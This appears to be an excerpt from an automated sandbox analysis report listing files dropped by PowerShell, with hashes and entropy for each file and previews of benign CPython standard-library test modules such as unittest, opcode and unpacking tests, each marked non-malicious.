                                                                                                                                                                                                              Preview:import dis..from test.support.import_helper import import_module..import unittest..import opcode...._opcode = import_module("_opcode")..from _opcode import stack_effect......class OpcodeTests(unittest.TestCase):.... def test_stack_effect(self):.. self.assertEqual(stack_effect(dis.opmap['POP_TOP']), -1).. self.assertEqual(stack_effect(dis.opmap['BUILD_SLICE'], 0), -1).. self.assertEqual(stack_effect(dis.opmap['BUILD_SLICE'], 1), -1).. self.assertEqual(stack_effect(dis.opmap['BUILD_SLICE'], 3), -2).. self.assertRaises(ValueError, stack_effect, 30000).. self.assertRaises(ValueError, stack_effect, dis.opmap['BUILD_SLICE']).. self.assertRaises(ValueError, stack_effect, dis.opmap['POP_TOP'], 0).. # All defined opcodes.. has_arg = dis.hasarg.. for name, code in filter(lambda item: item[0] not in dis.deoptmap, dis.opmap.items()):.. if code >= opcode.MIN_INSTRUMENTED_OPCODE:.. continue..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14273
                                                                                                                                                                                                              Entropy (8bit):4.782994181331062
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:eucws1gKLDgA1ljwAIzGARigyARieAbQzI9qsWfpKkjWXZlyKHHdjVoA:eFwqoiMi/9qzaHXp
                                                                                                                                                                                                              MD5:E0D5733C004F4BF25C12FD71278DE020
                                                                                                                                                                                                              SHA1:06DA5E401A41571A74E4620AC63F18518701B75A
                                                                                                                                                                                                              SHA-256:34EE6763B540FE2DE17703E98B35D4B26B909D4581C47C91714E1CAD3A32B661
                                                                                                                                                                                                              SHA-512:02AF71953A87BF6422859AC27B8E58E81AC48893F28E3E1E1AC0FFB924A106B33C432F08333020D6FC6431B55949C357B3E0812EBD8681A3178079D73EFAD15F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..Test suite for _osx_support: shared OS X support functions..."""....import os..import platform..import stat..import sys..import unittest....from test.support import os_helper....import _osx_support....@unittest.skipUnless(sys.platform.startswith("darwin"), "requires OS X")..class Test_OSXSupport(unittest.TestCase):.... def setUp(self):.. self.maxDiff = None.. self.prog_name = 'bogus_program_xxxx'.. self.temp_path_dir = os.path.abspath(os.getcwd()).. self.env = self.enterContext(os_helper.EnvironmentVarGuard()).. for cv in ('CFLAGS', 'LDFLAGS', 'CPPFLAGS',.. 'BASECFLAGS', 'BLDSHARED', 'LDSHARED', 'CC',.. 'CXX', 'PY_CFLAGS', 'PY_LDFLAGS', 'PY_CPPFLAGS',.. 'PY_CORE_CFLAGS', 'PY_CORE_LDFLAGS'):.. if cv in self.env:.. self.env.unset(cv).... def add_expected_saved_initial_values(self, config_vars, expected_vars):.. # Ensure that the i
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):54996
                                                                                                                                                                                                              Entropy (8bit):4.33937698205422
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:47XdIcLSjIoPR+5uF0D4qtFWY2ELZoiyeQBXS1XEbpLmpu+:47qjIoPR+5uF0D4qtFWY2EHyeQBXSybq
                                                                                                                                                                                                              MD5:5885596A4B0C953427DA1FDCC2B24AF2
                                                                                                                                                                                                              SHA1:B2B76E8E946A1E9D32F35FB1ED1495138FF49ECB
                                                                                                                                                                                                              SHA-256:F4B775EA494F6709AD2EAA18209DB06F1B8705A899261DB18D44B7F62DC57126
                                                                                                                                                                                                              SHA-512:8DCB311ED598A5CF8C2703697E1041B258829492D5696C5AA2E29CF082F1566C5FFE9B891F880237BD961B3549225B39174B99FC5F7BA59EA53E106085D9145E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from collections import namedtuple..import contextlib..import sys..from textwrap import dedent..import threading..import time..import unittest....from test.support import import_helper....from test.test__xxsubinterpreters import (.. interpreters,.. _run_output,.. clean_up_interpreters,..)......channels = import_helper.import_module('_xxinterpchannels')......##################################..# helpers....#@contextmanager..#def run_threaded(id, source, **shared):..# def run():..# run_interp(id, source, **shared)..# t = threading.Thread(target=run)..# t.start()..# yield..# t.join()......def run_interp(id, source, **shared):.. _run_interp(id, source, shared)......def _run_interp(id, source, shared, _mainns={}):.. source = dedent(source).. main = interpreters.get_main().. if main == id:.. if interpreters.get_current() != main:.. raise RuntimeError.. # XXX Run a func?.. exec(source, _mainns).. else:.. inte
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):29051
                                                                                                                                                                                                              Entropy (8bit):4.319215824402533
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:s2qdWyKWXHzHUbtmLVWxS1Vvw+hjH04RIocXAxay7:s22BIeiS1Vvw+1H04RIRi
                                                                                                                                                                                                              MD5:0A9DB4153D56BED47607BA488043BE13
                                                                                                                                                                                                              SHA1:0816D5560F212B346CA9B779FE771223E0F9002F
                                                                                                                                                                                                              SHA-256:1ED854C6B3D19D9149C9C3460929A6D6A160C162342316E127842A63433414CB
                                                                                                                                                                                                              SHA-512:3DFDC24BC4E68DC00030B0A63C7A6031AAEDC991B7349E99717D0A7E0CD453B98285EF1A696B7829FA89DE448DCC4B3B28F30DA22D96DD47BD1250624F34AA8E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib..import itertools..import os..import pickle..import sys..from textwrap import dedent..import threading..import unittest....import _testcapi..from test import support..from test.support import import_helper..from test.support import script_helper......interpreters = import_helper.import_module('_xxsubinterpreters')......##################################..# helpers....def _captured_script(script):.. r, w = os.pipe().. indented = script.replace('\n', '\n ').. wrapped = dedent(f""".. import contextlib.. with open({w}, 'w', encoding="utf-8") as spipe:.. with contextlib.redirect_stdout(spipe):.. {indented}.. """).. return wrapped, open(r, encoding="utf-8")......def _run_output(interp, request, shared=None):.. script, rpipe = _captured_script(request).. with rpipe:.. interpreters.run_string(interp, script, shared).. return rpipe.read()......def _wait_for_interp_to_run(interp, timeo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):154
                                                                                                                                                                                                              Entropy (8bit):4.4804428672629415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSxSrQXJRpWQVSRF8mo+vr3NaMWRjXC+g+zp+vr3crAwGfnJFU:auQXJRpXIF8twNaMAXlg6wIAa
                                                                                                                                                                                                              MD5:E1B27D214A1714271983EE7F7F5C9F37
                                                                                                                                                                                                              SHA1:C62C91FEEB1F5AE570B5C9C03AE29EE445639429
                                                                                                                                                                                                              SHA-256:329743706D4D31DB91597C27C0E61F754473B15FB89C52B67FFBD5D6B9D6041A
                                                                                                                                                                                                              SHA-512:A0A7604F0C7ABCBB677FD182345F04BE971B40A784BCF28EFE62EEE18090672222468791E981754B1900B9F0830139EA9BF09E2103E3B0E9A1A5ADCA26CDBA09
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import os.path..from test.support import load_package_tests......def load_tests(*args):.. return load_package_tests(os.path.dirname(__file__), *args)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):62
                                                                                                                                                                                                              Entropy (8bit):4.097848182486862
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:1LYBmo6LShh9QLM3z6RNMy:1L6tKkQLMSMy
                                                                                                                                                                                                              MD5:47878C074F37661118DB4F3525B2B6CB
                                                                                                                                                                                                              SHA1:9671E2EF6E3D9FA96E7450BCEE03300F8D395533
                                                                                                                                                                                                              SHA-256:B4DC0B48D375647BCFAB52D235ABF7968DAF57B6BBDF325766F31CE7752D7216
                                                                                                                                                                                                              SHA-512:13C626ADA191848C31321C74EB7F0F1FDE5445A82D34282D69E2B086BA6B539D8632C82BBA61FF52185F75FEC2514DAD66139309835E53F5B09A3C5A2EBECFF5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from . import load_tests..import unittest....unittest.main()..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2011
                                                                                                                                                                                                              Entropy (8bit):4.574932730225462
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:KPCxniolKHrErHXMr613f0HldlvfqSaVZLe:K8iolKHrM8e1vslvfqSGZLe
                                                                                                                                                                                                              MD5:6113B8B134D2134613B7A3F11E15325C
                                                                                                                                                                                                              SHA1:82302E123A841821E8098544ADD4DA2429431CBD
                                                                                                                                                                                                              SHA-256:02E8EEB2F1C53C373863F70D09ED33409D0E643F8FC55FF3C28F0E4E900FCE2E
                                                                                                                                                                                                              SHA-512:CFCD01CEAA5C0781B6352EA2CF7BB1F3434C8D2047FC2CD8721B51EA59398C4DD937B06A346947CA343B0B02DCB195D21B35C3C51B4F5FA0F4A1BD2A4D83DBF5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# helper module for test_runner.Test_TextTestRunner.test_warnings...."""..This module has a number of tests that raise different kinds of warnings...When the tests are run, the warnings are caught and their messages are printed..to stdout. This module also accepts an arg that is then passed to..unittest.main to affect the behavior of warnings...Test_TextTestRunner.test_warnings executes this script with different..combinations of warnings args and -W flags and check that the output is correct...See #10535..."""....import sys..import unittest..import warnings....def warnfun():.. warnings.warn('rw', RuntimeWarning)....class TestWarnings(unittest.TestCase):.. def test_other_unittest(self):.. self.assertAlmostEqual(2+2, 4).. self.assertNotAlmostEqual(4+4, 2).... # these warnings are normally silenced, but they are printed in unittest.. def test_deprecation(self):.. warnings.warn('dw', DeprecationWarning).. warnings.warn('dw', DeprecationWarning)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):62155
                                                                                                                                                                                                              Entropy (8bit):4.547201319253416
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gKkzKkj/jzTWEooUEnSxC7yJnNMdCv/nmy61p4yanCBahmeSLyr/qJfyjzD5e:gKkzKkj/jzT/S2yFNMdCXSThuVYVBf2o
                                                                                                                                                                                                              MD5:FDDCBCF7913EA9AB641A4E61D4846FB7
                                                                                                                                                                                                              SHA1:ECD322E814F374E4481D049DC292AFAEDE3B74CA
                                                                                                                                                                                                              SHA-256:3682097A7C1CA0A02633F2C113861A852C8E406F6B882A6452E3A6DF609E15FB
                                                                                                                                                                                                              SHA-512:CC66A82F70F529C3AEAECFACCD3416E49D2C098104813647F6D6F6132404BD7B1BA8B83D9085A086F14A95B82407B7BCA6FEEC033B236378E8F4920E7F5857E3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools..import sys..import types....import unittest....class Test_TestLoader(unittest.TestCase):.... ### Basic object tests.. ################################################################.... def test___init__(self):.. loader = unittest.TestLoader().. self.assertEqual([], loader.errors).... ### Tests for TestLoader.loadTestsFromTestCase.. ################################################################.... # "Return a suite of all test cases contained in the TestCase-derived.. # class testCaseClass".. def test_loadTestsFromTestCase(self):.. class Foo(unittest.TestCase):.. def test_1(self): pass.. def test_2(self): pass.. def foo_bar(self): pass.... tests = unittest.TestSuite([Foo('test_1'), Foo('test_2')]).... loader = unittest.TestLoader().. self.assertEqual(loader.loadTestsFromTestCase(Foo), tests).... # "Return a suite of all test cases contained in the TestCase-derived
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18661
                                                                                                                                                                                                              Entropy (8bit):4.482707914429151
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:AkV/Rfi/7szoDv1yR1zG1m1ZGQNbWsqyas/F//0F1o1sWhoZDy:AkrBhEAH
                                                                                                                                                                                                              MD5:FA990B86495AAB8B5C9340244CF59C18
                                                                                                                                                                                                              SHA1:C2A94054A903CFDDC67E40B5DFE4223E6135C5FA
                                                                                                                                                                                                              SHA-256:39A81DA2EA47E01280540B3977809A52AFC48123010DD163B8C1BA7EFB216C8E
                                                                                                                                                                                                              SHA-512:E590081FE719C4E3D435A455BE065E0CA2837599ACD86C5AAFED830E06AE9D891B1149BF1FA6E4DFC15680BC9DA9CB03ECD579ECB91C6C2FF5D4B36FFFB12054
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import os..import sys..import subprocess..from test import support..import unittest..import test.test_unittest..from test.test_unittest.test_result import BufferedWriter......class Test_TestProgram(unittest.TestCase):.... def test_discovery_from_dotted_path(self):.. loader = unittest.TestLoader().... tests = [self].. expectedPath = os.path.abspath(os.path.dirname(test.test_unittest.__file__)).... self.wasRun = False.. def _find_tests(start_dir, pattern):.. self.wasRun = True.. self.assertEqual(start_dir, expectedPath).. return tests.. loader._find_tests = _find_tests.. suite = loader.discover('test.test_unittest').. self.assertTrue(self.wasRun).. self.assertEqual(suite._tests, tests).... # Horrible white box test.. def testNoExit(self):.. result = object().. test = object().... class FakeRunner(object):.. def run(self, test):.. self.tes
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55355
                                                                                                                                                                                                              Entropy (8bit):4.500147564492887
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:KPEUQAWA4L5vmRUa9Hi8JoTOtdf9ovj3VDy03xVCnc0l2e1rRRktDh2Xw9iDzqg0:KPEG4L5JTOn1vz1rCzhFMT4kbJlo/
                                                                                                                                                                                                              MD5:4F4F0BCBC8F134E90F43BC29DC461D0C
                                                                                                                                                                                                              SHA1:6C1A364D8619DA279FD5F9FC31E6D5D5F5D346AB
                                                                                                                                                                                                              SHA-256:EF9C821DF731B8A3431B22F3133D98E7B28D56BF125C7D64016617D3639B4ECD
                                                                                                                                                                                                              SHA-512:E31994306DA3991534E5D10052D65DEA1FF4CDEDA8A8A1E4355C0A716FC51ECA50E518D3B26F97BDF1B0FCC9C5304B66B26D04CAFA86AAB85FBAAE5FA9C0E5AF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import io..import sys..import textwrap....from test.support import warnings_helper, captured_stdout....import traceback..import unittest..from unittest import mock..from unittest.util import strclass..from test.test_unittest.support import BufferedWriter......class MockTraceback(object):.. class TracebackException:.. def __init__(self, *args, **kwargs):.. self.capture_locals = kwargs.get('capture_locals', False).. def format(self):.. result = ['A traceback'].. if self.capture_locals:.. result.append('locals').. return result....def restore_traceback():.. unittest.result.traceback = traceback......def bad_cleanup1():.. print('do cleanup1').. raise TypeError('bad cleanup1')......def bad_cleanup2():.. print('do cleanup2').. raise ValueError('bad cleanup2')......class Test_TestResult(unittest.TestCase):.. # Note: there are not separate tests for TestResult.wasSuccessful(),.. # TestResult.errors
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):54023
                                                                                                                                                                                                              Entropy (8bit):4.404222829834466
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:mdeg3fJ/dTejHPI6Il7u9tE1EBd/NY6e8HPQ+:mdR/dTejHPGl7l1Qd/NY6e8HPV
                                                                                                                                                                                                              MD5:2FB9823AE761E1554CFD4E646FDD8B17
                                                                                                                                                                                                              SHA1:5CD3833C0E380D49B99B956653DABFE1D018D89A
                                                                                                                                                                                                              SHA-256:2C4708F91517C2F8E3FAE40F176B21AD7FD38F96E17BF0F2B741DD42599EFD1A
                                                                                                                                                                                                              SHA-512:2A1F21C448088FDB3B59A0B135ABE2823DBAEBF6176084C330F82BB739CEB53F1F83DFA115D3C586228487ED93FEE9305DDD0F79B07E65D8F1713FFD30EB79FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import io..import os..import sys..import pickle..import subprocess..from test import support....import unittest..from unittest.case import _Outcome....from test.test_unittest.support import (.. BufferedWriter,.. LoggingResult,.. ResultWithNoStartTestRunStopTestRun,..)......def resultFactory(*_):.. return unittest.TestResult()......def getRunner():.. return unittest.TextTestRunner(resultclass=resultFactory,.. stream=io.StringIO())......class CustomError(Exception):.. pass....# For test output compat:..CustomErrorRepr = f"{__name__ + '.' if __name__ != '__main__' else ''}CustomError"......def runTests(*cases):.. suite = unittest.TestSuite().. for case in cases:.. tests = unittest.defaultTestLoader.loadTestsFromTestCase(case).. suite.addTests(tests).... runner = getRunner().... # creating a nested suite exposes some potential bugs.. realSuite = unittest.TestSuite().. realSuite.addTest(suite).. # adding
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17010
                                                                                                                                                                                                              Entropy (8bit):4.1617988264296395
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:KU1TRqXkM52xprISndtKP/+f/XP/Kt/tvSuKu/P/3Q/P/+0ifqnlBYfmy:KcqXZ0xprVQaCp
                                                                                                                                                                                                              MD5:D38AF502442B49FD8F0048BA779368C5
                                                                                                                                                                                                              SHA1:1721716D9F1981614731636DAFCB7FE926E1EE14
                                                                                                                                                                                                              SHA-256:3598BD4B27C7FC42D6BE2A96A08DC6DDEC1C341F04E7CFF15A2093C2623C1CBA
                                                                                                                                                                                                              SHA-512:3519229E388AD2025A99B627AE4CAD35FF2753835EC8BDE38D53D2555095FAB5967D9D08651E9C8BF3847887E7216CB2D9F9C81FF1165BD5E4E30A9E251953BA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import io..import sys....import unittest......def resultFactory(*_):.. return unittest.TestResult()......class TestSetups(unittest.TestCase):.... def getRunner(self):.. return unittest.TextTestRunner(resultclass=resultFactory,.. stream=io.StringIO()).. def runTests(self, *cases):.. suite = unittest.TestSuite().. for case in cases:.. tests = unittest.defaultTestLoader.loadTestsFromTestCase(case).. suite.addTests(tests).... runner = self.getRunner().... # creating a nested suite exposes some potential bugs.. realSuite = unittest.TestSuite().. realSuite.addTest(suite).. # adding empty suites to the end exposes potential bugs.. suite.addTest(unittest.TestSuite()).. realSuite.addTest(unittest.TestSuite()).. return runner.run(realSuite).... def test_setup_class(self):.. class Test(unittest.TestCase):.. setUpCalled = 0..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20615
                                                                                                                                                                                                              Entropy (8bit):4.254743089027374
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:AlPrnHM9dMoY4YWCq093g33rDtmTqCk/iibCs/x9CcsGLes+:A7Vh
                                                                                                                                                                                                              MD5:4AF94C9FAF49B5879052113365D1D049
                                                                                                                                                                                                              SHA1:86658997EF08E14AE6E5B0309DFC8E70FB675F04
                                                                                                                                                                                                              SHA-256:9B1B7AE87D821E304777B16EBE4F6BD0FF39DC9FDE86FA5E165B67FDEEC2C272
                                                                                                                                                                                                              SHA-512:5D47A7E98592920CAF2C907697CCF8FDCF30F543FADFA0005658B351A0E469269CCB25CB58020D1870ACE459B393457CEF861336A33FC4000DD436F06316C92B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest....from test.test_unittest.support import LoggingResult......class Test_TestSkipping(unittest.TestCase):.... def test_skipping(self):.. class Foo(unittest.TestCase):.. def defaultTestResult(self):.. return LoggingResult(events).. def test_skip_me(self):.. self.skipTest("skip").. events = [].. result = LoggingResult(events).. test = Foo("test_skip_me").. self.assertIs(test.run(result), result).. self.assertEqual(events, ['startTest', 'addSkip', 'stopTest']).. self.assertEqual(result.skipped, [(test, "skip")]).... events = [].. result = test.run().. self.assertEqual(events, ['startTestRun', 'startTest', 'addSkip',.. 'stopTest', 'stopTestRun']).. self.assertEqual(result.skipped, [(test, "skip")]).. self.assertEqual(result.testsRun, 1).... # Try letting setUp skip the test now... class Foo(u
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15636
                                                                                                                                                                                                              Entropy (8bit):4.441987793399576
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:1MK6FuA8Rd3eySW2g7XUDiEz9iWAprG/I/s/huF/BAy:1MKg8R9eypLEz09B/v
                                                                                                                                                                                                              MD5:A39D5D8F0D8C95C89113B129FFEFB101
                                                                                                                                                                                                              SHA1:B289903D9F8F89320329F46C6F53252F88C72E50
                                                                                                                                                                                                              SHA-256:CD2B2841B4C94BD29705BC89D63D4BE63DDCB3C6CD9C3F74B13384A8ABC68366
                                                                                                                                                                                                              SHA-512:082F3D349A4583EBED37E81003AA8051344084EFA68BD27053D26EB480F9D9BC3F711A722172B44204E66F76BFD7E27BD5465E9E1EF6C9DF8618146BF9A8F445
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest....import gc..import sys..import weakref..from test.test_unittest.support import LoggingResult, TestEquality......### Support code for Test_TestSuite..################################################################....class Test(object):.. class Foo(unittest.TestCase):.. def test_1(self): pass.. def test_2(self): pass.. def test_3(self): pass.. def runTest(self): pass....def _mk_TestSuite(*names):.. return unittest.TestSuite(Test.Foo(n) for n in names)....################################################################......class Test_TestSuite(unittest.TestCase, TestEquality):.... ### Set up attributes needed by inherited tests.. ################################################################.... # Used by TestEquality.test_eq.. eq_pairs = [(unittest.TestSuite(), unittest.TestSuite()).. ,(unittest.TestSuite(), unittest.TestSuite([])).. ,(_mk_TestSuite('test_1'), _mk_TestSuite('test_1'))]....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4071
                                                                                                                                                                                                              Entropy (8bit):4.881198487305379
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:IVFrstCqoCAQKG8BoUybHMqa32O2C2sAQaCdeCWDtekJp/5mBopj7SR/gAy:IVlswqoCoybHje2O2C2sAQaC0CkBpwBW
                                                                                                                                                                                                              MD5:91EEDC633830DBE24CA1932C36501BFB
                                                                                                                                                                                                              SHA1:80441D3858FCBCB054581B40081E25FC9ADDD666
                                                                                                                                                                                                              SHA-256:5699484FD4617A66BCDFAB1C90924BF4F4FEB580D9F7856CE6A6EC9DE85A9100
                                                                                                                                                                                                              SHA-512:0E43C0EE87C95287F0B46FAF2A6E967792863097BB22B7479DF7ABC2F45983770B8019F7CC9778E3E5F1B9A84C51573CA26F0F490677749DF86CB26A3758BCC9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tests universal newline support for both reading and parsing files...import io..import _pyio as pyio..import unittest..import os..import sys..from test.support import os_helper......if not hasattr(sys.stdin, 'newlines'):.. raise unittest.SkipTest(.. "This Python does not have universal newline support")....FATX = 'x' * (2**14)....DATA_TEMPLATE = [.. "line1=1",.. "line2='this is a very long line designed to go past any default " +.. "buffer limits that exist in io.py but we also want to test " +.. "the uncommon case, naturally.'",.. "def line3():pass",.. "line4 = '%s'" % FATX,.. ]....DATA_LF = "\n".join(DATA_TEMPLATE) + "\n"..DATA_CR = "\r".join(DATA_TEMPLATE) + "\r"..DATA_CRLF = "\r\n".join(DATA_TEMPLATE) + "\r\n"....# Note that DATA_MIXED also tests the ability to recognize a lone \r..# before end-of-file...DATA_MIXED = "\n".join(DATA_TEMPLATE) + "\r"..DATA_SPLIT = [x + "\n" for x in DATA_TEMPLATE]....class CTest:.. open = io.open....class P
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3762
                                                                                                                                                                                                              Entropy (8bit):4.615164036088548
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:aXWaOZ3OVH4hAr3csK5LTtULT0H5xNiES90LmupKA:Mx54h3J0IH5xIES90LmupKA
                                                                                                                                                                                                              MD5:F594068EDD7B943B5A0778DB4BBAED29
                                                                                                                                                                                                              SHA1:C3B83E625A3C56D9CBA7897EDAFB68B3CC8AA47F
                                                                                                                                                                                                              SHA-256:6FA02A8F94E9C2AB537A749F3B69895BB6A091F1B71A399711E570E778563BF7
                                                                                                                                                                                                              SHA-512:539B7EA4A427FCE4D0A58FC9C6DF074A7D878E458E4E8B8E83CEAC620420850814585190272EB1D9A42CB13A425E65D869F1B481161A2D0E4AF04F292F44B494
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import doctest..import unittest......doctests = """....Unpack tuple.... >>> t = (1, 2, 3).. >>> a, b, c = t.. >>> a == 1 and b == 2 and c == 3.. True....Unpack list.... >>> l = [4, 5, 6].. >>> a, b, c = l.. >>> a == 4 and b == 5 and c == 6.. True....Unpack implied tuple.... >>> a, b, c = 7, 8, 9.. >>> a == 7 and b == 8 and c == 9.. True....Unpack string... fun!.... >>> a, b, c = 'one'.. >>> a == 'o' and b == 'n' and c == 'e'.. True....Unpack generic sequence.... >>> class Seq:.. ... def __getitem__(self, i):.. ... if i >= 0 and i < 3: return i.. ... raise IndexError.. ..... >>> a, b, c = Seq().. >>> a == 0 and b == 1 and c == 2.. True....Single element unpacking, with extra syntax.... >>> st = (99,).. >>> sl = [100].. >>> a, = st.. >>> a.. 99.. >>> b, = sl.. >>> b.. 100....Now for some failures....Unpacking non-sequence.... >>> a, b, c = 7.. Traceback (most recent call la
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10531
                                                                                                                                                                                                              Entropy (8bit):4.782106285371004
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:853ONTbB/UpT+WHrT2V+iqo4PRQJoqbb4n2S5OA:8s+pT+WllPRZOA
                                                                                                                                                                                                              MD5:19B7BBC9394EE159E32B1419A0699A00
                                                                                                                                                                                                              SHA1:E38F559EF4F8CFED9AEFD500F8F2F9C24690154F
                                                                                                                                                                                                              SHA-256:A0CEC85BE190719032982BE298B36A49C5B8EADB3A23DCDBDD2085AD5A83563B
                                                                                                                                                                                                              SHA-512:4A5B36B1FBFA4E063CBB8F62BEE403953C75FAD79E07A99D6601CF2F86029744D85F3FB22B1780A4255F68DF52C68E97BEEDF4A567F816E49C1F06A0A2FF87AC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tests for extended unpacking, starred expressions.....import doctest..import unittest......doctests = """....Unpack tuple.... >>> t = (1, 2, 3).. >>> a, *b, c = t.. >>> a == 1 and b == [2] and c == 3.. True....Unpack list.... >>> l = [4, 5, 6].. >>> a, *b = l.. >>> a == 4 and b == [5, 6].. True....Unpack implied tuple.... >>> *a, = 7, 8, 9.. >>> a == [7, 8, 9].. True....Unpack string... fun!.... >>> a, *b = 'one'.. >>> a == 'o' and b == ['n', 'e'].. True....Unpack long sequence.... >>> a, b, c, *d, e, f, g = range(10).. >>> (a, b, c, d, e, f, g) == (0, 1, 2, [3, 4, 5, 6], 7, 8, 9).. True....Unpack short sequence.... >>> a, *b, c = (1, 2).. >>> a == 1 and c == 2 and b == [].. True....Unpack generic sequence.... >>> class Seq:.. ... def __getitem__(self, i):.. ... if i >= 0 and i < 3: return i.. ... raise IndexError.. ..... >>> a, *b = Seq().. >>> a == 0 and b == [1, 2].. True....Unp
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):28258
                                                                                                                                                                                                              Entropy (8bit):4.730821505027901
                                                                                                                                                                                                              Encrypted:false
